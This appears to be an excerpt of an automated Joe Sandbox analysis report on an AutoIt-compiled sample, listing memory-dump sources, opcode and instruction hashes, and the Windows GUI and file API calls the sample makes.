                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 8f0a6f784f97942b43784582b1d6fe5fd066248836564df092c660c22c055570
                                        • Instruction ID: c980d46b0653971412f51a32b3fb63a18e27590b6b0177063f219e7224d655c4
                                        • Opcode Fuzzy Hash: 8f0a6f784f97942b43784582b1d6fe5fd066248836564df092c660c22c055570
                                        • Instruction Fuzzy Hash:
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction ID: 38797e97cbe3b5409aa3815a2bb343da2a5e654f334e17621c228c33a7fc6c15
                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction Fuzzy Hash: 655155636BC6055ADFB88528885E7FF23C9DB42304F280509E88EDB292CE15DE02F356
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b624095efe4bcb400282fa4cf748b89b74a9d044cd904a9e020dd5b4d329938
                                        • Instruction ID: b1c134f8956a207e56876a2c8e0e16dd961045747b927b463f8edc960c716a8f
                                        • Opcode Fuzzy Hash: 6b624095efe4bcb400282fa4cf748b89b74a9d044cd904a9e020dd5b4d329938
                                        • Instruction Fuzzy Hash: 22321222D29F014DDB279634DD22336A689AFB73C5F15D737E81AB5EA6EB29C4C34100
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4a2035383c92253d1313187d4a9bb51fabf9fe4ada2a89b918824ef4e2614189
                                        • Instruction ID: 697fc979da455f762f84046bd0ae89c2fd4ba70325c135f9452167aabdee80f1
                                        • Opcode Fuzzy Hash: 4a2035383c92253d1313187d4a9bb51fabf9fe4ada2a89b918824ef4e2614189
                                        • Instruction Fuzzy Hash: D832EE32A041458BFF78DB28C494FBDBBE1EB45304F28856ED89E9B691D230DD81DB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e00d967fd922ff65fd840393897745b48de71f0dab8b9eb2286da84822d77c9
                                        • Instruction ID: 802983f7a3554a8ea7a6637e72ef10b65f87bdf6d9c423c45b617bd45877b813
                                        • Opcode Fuzzy Hash: 4e00d967fd922ff65fd840393897745b48de71f0dab8b9eb2286da84822d77c9
                                        • Instruction Fuzzy Hash: 01229E70E0060A9FDF14CF64C881BEEB3F5FF48341F148569E81AA7291EB3AA954CB54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 773360346f70fd0ccf366287177f6532d836d0d318b02c6750539d4e08476acf
                                        • Instruction ID: 3c68fc2988fd752fdc9b8abb66e7da8735c0166c4d9a53cb2063fc79394e48c3
                                        • Opcode Fuzzy Hash: 773360346f70fd0ccf366287177f6532d836d0d318b02c6750539d4e08476acf
                                        • Instruction Fuzzy Hash: 8202C8B0E00206EFDF14DF64D841AEEB7B5FF44300F118169E85A9B291EB35AE51CB95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction ID: 694a63dade0066b89d1952879eb0f7cbb0ab3662a43bd2723c497e578426910f
                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction Fuzzy Hash: 179146727090A34ADF6D463A85740BEFFE15F923A131A079DE4F2CA1C5EE24D954F620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction ID: a58054e344b473841416efdac37b73d5464cfae3d150d6840d3de0da533d2b8e
                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction Fuzzy Hash: 749114723090A34ADFAD467A85740BDFFE15B923A231A079DD4F2CA1C5FE24D954F620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cfce7b9a270eda301d35c901ae258acc4a1e134889a665ff483664d4af79986
                                        • Instruction ID: e2aed95262f4a31aaeaf984653059465653dd59640585bc08ad7c7749e721bbc
                                        • Opcode Fuzzy Hash: 0cfce7b9a270eda301d35c901ae258acc4a1e134889a665ff483664d4af79986
                                        • Instruction Fuzzy Hash: E261897322C30956DEB899288CA5BFE23C9DF82700F14491EE94EDB292D7119E42F356
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e35cb4663c4237f45f6ff668a5bf9676b64470e1de4ec2ca47631a1264de539
                                        • Instruction ID: 9347b39de7720124cc5f3e459e21eddc03c4f8b441ec789aa4f6093cd90b6fe7
                                        • Opcode Fuzzy Hash: 3e35cb4663c4237f45f6ff668a5bf9676b64470e1de4ec2ca47631a1264de539
                                        • Instruction Fuzzy Hash: 8D61897333C70997DEB84A288851BFF23E8EF46704F104959E88FDB282DA129D42B355
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction ID: b7a1f876686d34415f0682e997a952b4598bcfea3502a30468e1d79fb2b29afb
                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction Fuzzy Hash: 9381627270D0A309DFAE427A85344BEFFE15F923A131A079ED4F2CA1C1EE249554F620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                        • Instruction ID: 977197442ba659309f1160f0f347bc28cd0695bd65fc828fa0d7372c05f19ec9
                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                        • Instruction Fuzzy Hash: CF41D5B1D1051CDBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f61e69edb1b8e20fa682f047c37a1066d25a5912eaee3995838f553889adf6f5
                                        • Instruction ID: f3c17f25d80af9693a0330d78127a62db9fd04f27a3117c63fccf021588c11de
                                        • Opcode Fuzzy Hash: f61e69edb1b8e20fa682f047c37a1066d25a5912eaee3995838f553889adf6f5
                                        • Instruction Fuzzy Hash: D621E7322206118BDB28CF79C82367E73E9A754320F558A2EE4A7D37D1DE35A944CB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                        • Instruction ID: 51e4b9455e7a4fbcca741ca06ecbae583418eff9dcb8a09b2036a5e0105e499e
                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                        • Instruction Fuzzy Hash: 140192B8A00109EFCB44DFA8C5909AEF7B5FF48314F208599D809A7701D730AE41DB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                        • Instruction ID: fa16e9ee16038011a5e11661fa166bc182b0b12904173ae976cdfffc8ef37646
                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                        • Instruction Fuzzy Hash: CB019278A04109EFCB44DFA8C5909AEF7B5FB48314F208599DC09A7701D730EE41DB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 000F2B30
                                        • DeleteObject.GDI32(00000000), ref: 000F2B43
                                        • DestroyWindow.USER32 ref: 000F2B52
                                        • GetDesktopWindow.USER32 ref: 000F2B6D
                                        • GetWindowRect.USER32(00000000), ref: 000F2B74
                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 000F2CA3
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 000F2CB1
                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2CF8
                                        • GetClientRect.USER32(00000000,?), ref: 000F2D04
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000F2D40
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2D62
                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2D75
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2D80
                                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2D89
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2D98
                                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2DA1
                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2DA8
                                        • GlobalFree.KERNEL32(00000000), ref: 000F2DB3
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2DC5
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0010FC38,00000000), ref: 000F2DDB
                                        • GlobalFree.KERNEL32(00000000), ref: 000F2DEB
                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 000F2E11
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 000F2E30
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2E52
                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F303F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                        • String ID: $AutoIt v3$DISPLAY$static
                                        • API String ID: 2211948467-2373415609
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 0010712F
                                        • GetSysColorBrush.USER32(0000000F), ref: 00107160
                                        • GetSysColor.USER32(0000000F), ref: 0010716C
                                        • SetBkColor.GDI32(?,000000FF), ref: 00107186
                                        • SelectObject.GDI32(?,?), ref: 00107195
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 001071C0
                                        • GetSysColor.USER32(00000010), ref: 001071C8
                                        • CreateSolidBrush.GDI32(00000000), ref: 001071CF
                                        • FrameRect.USER32(?,?,00000000), ref: 001071DE
                                        • DeleteObject.GDI32(00000000), ref: 001071E5
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00107230
                                        • FillRect.USER32(?,?,?), ref: 00107262
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00107284
                                          • Part of subcall function 001073E8: GetSysColor.USER32(00000012), ref: 00107421
                                          • Part of subcall function 001073E8: SetTextColor.GDI32(?,?), ref: 00107425
                                          • Part of subcall function 001073E8: GetSysColorBrush.USER32(0000000F), ref: 0010743B
                                          • Part of subcall function 001073E8: GetSysColor.USER32(0000000F), ref: 00107446
                                          • Part of subcall function 001073E8: GetSysColor.USER32(00000011), ref: 00107463
                                          • Part of subcall function 001073E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00107471
                                          • Part of subcall function 001073E8: SelectObject.GDI32(?,00000000), ref: 00107482
                                          • Part of subcall function 001073E8: SetBkColor.GDI32(?,00000000), ref: 0010748B
                                          • Part of subcall function 001073E8: SelectObject.GDI32(?,?), ref: 00107498
                                          • Part of subcall function 001073E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001074B7
                                          • Part of subcall function 001073E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001074CE
                                          • Part of subcall function 001073E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001074DB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                        • String ID:
                                        • API String ID: 4124339563-0
                                        • Opcode ID: a90553b4352e82dc61893a5abbdefbf1ea69a454799ed33c4a4bc254941441eb
                                        • Instruction ID: 4268cca0b5ed430c3d1e7cba945704a671df5e9a490d4de06abb9da9e9c20f10
                                        • Opcode Fuzzy Hash: a90553b4352e82dc61893a5abbdefbf1ea69a454799ed33c4a4bc254941441eb
                                        • Instruction Fuzzy Hash: 79A18F72508301EFD7119F60DC48A6BBBA9FB89320F104B19F9E2965E1D7B1E984CF91
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 00088E14
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 000C6AC5
                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000C6AFE
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000C6F43
                                          • Part of subcall function 00088F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00088BE8,?,00000000,?,?,?,?,00088BBA,00000000,?), ref: 00088FC5
                                        • SendMessageW.USER32(?,00001053), ref: 000C6F7F
                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000C6F96
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 000C6FAC
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 000C6FB7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                        • String ID: 0
                                        • API String ID: 2760611726-4108050209
                                        • Opcode ID: 4c4d3152b8b13019ab742c9fe9056caab9d263bac3f7b7d9dd82e5a7d4520ae0
                                        • Instruction ID: 2ff12bca7e5c2579ebfe5ee28161b0dead926d0987f95ed7dad1ce741f36d9fe
                                        • Opcode Fuzzy Hash: 4c4d3152b8b13019ab742c9fe9056caab9d263bac3f7b7d9dd82e5a7d4520ae0
                                        • Instruction Fuzzy Hash: 5D129B38600201AFDB75DF14C888FAAB7E5FB49300F54856DF4858B662CB72AC92CF91
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 000F273E
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000F286A
                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 000F28A9
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 000F28B9
                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 000F2900
                                        • GetClientRect.USER32(00000000,?), ref: 000F290C
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 000F2955
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000F2964
                                        • GetStockObject.GDI32(00000011), ref: 000F2974
                                        • SelectObject.GDI32(00000000,00000000), ref: 000F2978
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 000F2988
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000F2991
                                        • DeleteDC.GDI32(00000000), ref: 000F299A
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000F29C6
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 000F29DD
